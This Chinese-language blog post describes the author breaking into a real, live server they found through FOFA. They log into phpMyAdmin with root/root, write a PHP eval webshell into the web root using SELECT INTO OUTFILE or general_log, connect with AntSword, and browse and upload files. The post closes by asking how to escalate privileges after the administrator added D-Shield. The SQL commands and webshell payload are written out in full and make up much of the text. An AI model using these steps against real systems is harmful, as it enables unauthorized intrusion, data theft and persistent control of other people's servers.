从漏洞复现到实战getshell

前提

之前有过几次实战getshell了，但是管理员比较敏感，解决不了就下线，趁着这次管理员还没有下线，赶紧拿出来投个稿。

信息收集

因为偶然看到了phpstudy探针，所以就去fofa搜索了一下：

(因为是很久以前的洞了，所以大部分网站都补了，我应该算是捡了个漏)
大概页面如下：

在这里，需要注意的是绝对路径，服务器操作系统，php版本，ip
绝对路径:G:/www/index.php
操作系统：Windows NT HB2008 6.1 build 7601
php版本：5.2.17

测试弱口令

弱口令：root/root或者root/空(不过最新的phpmyadmin貌似不允许用root登录)
当我填入root/root时，进行账号密码测试：

一看连接到mysql数据库正常，开心，访问url/phpmyadmin

同样用root和root登录上

<h1>查看当前权限</h1>
习惯性查看当前用户权限：

select user();

一看，漂亮，root权限，那不是代表我们可以为所欲为？
但是我们需要写入一句话，那么需要知道该服务器是否可以写入文件：

show variables like '%general%'; #查看配置

写入文件权限开启，并且知道了写入路径；
补充：
如果不是root那就需要一系列提权操作，社区里各位大哥讲得很详细，我就不赘述了。
如果原本写入文件权限没有开启，就需要让它开启，命令如下：

set global general_log = on; #开启general log模式
set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址

插入一句话木马

在信息收集那步(或者通过查询写入文件权限的时候)，我们已经知道了绝对路径，就随便找一个数据库，插入一句话木马，如下：

select '<?php echo "a";@eval($_POST[a]);?>' into outfile 'G:\\www\\shelll.php';

之后连接直接连接蚁剑：

就这样，我几乎可以浏览这个电脑上除了c盘以外的盘的所有文件，并对其进行上传下载文件。

后话

大概过了几天，管理员发现了，于是加了D盾。
shell没删，但是权限极低。只允许在当前的G盘活动
探针没关，但是写入文件会被D盾拦截

一点一点试了之后，发现这个过滤的机制很狗，D盾过滤把select的s换成了_,然后一旦执行除表名之外的查询就被拦截，也不允许创建库表之类的。
暂时就止步于此了，对于windows提权我也不是很熟，想知道各位表哥之后怎么对它进行提权。